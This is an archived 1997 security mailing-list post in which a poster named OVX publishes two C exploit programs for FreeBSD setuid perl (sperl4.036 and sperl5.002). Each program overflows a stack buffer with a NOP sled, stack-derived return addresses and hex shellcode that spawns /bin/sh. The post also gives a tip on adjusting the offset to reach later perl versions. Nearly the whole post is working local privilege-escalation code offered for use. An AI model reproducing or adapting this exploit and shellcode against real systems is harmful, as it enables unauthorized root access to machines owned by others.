Exploits for FreeBSD sperl4.036 & sperl5.00x

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: SGI Security Coordinator: "SGI Advisory 19970401-01-PX - IRIX gmemusage program"
• Previous message: Aleph One: "[NTSEC] Re: @LERT - NT security flaw announcement"

First works on perl4.036 and the second on perl5.002 ...
With a little modyfication of OFFSET value you can overflow all versions up
to perl5.003

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;

memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));

buf[BUFFER_SIZE-1]=0;

execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl5.00X by OVX */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 1400
#define OFFSET 1000

char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

for(i=0;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;

memset(buf,0x90,768);
memcpy(&buf[768],execshell,strlen(execshell));

buf[BUFFER_SIZE-1]=0;

execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------

PS: Pozdrowienia dla wszystkich polskich hackerow ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ? //
// OVX - deliver@free.polbox.pl //
//////////////////////////////////////////////////////////////////////////

• Next message: SGI Security Coordinator: "SGI Advisory 19970401-01-PX - IRIX gmemusage program"
• Previous message: Aleph One: "[NTSEC] Re: @LERT - NT security flaw announcement"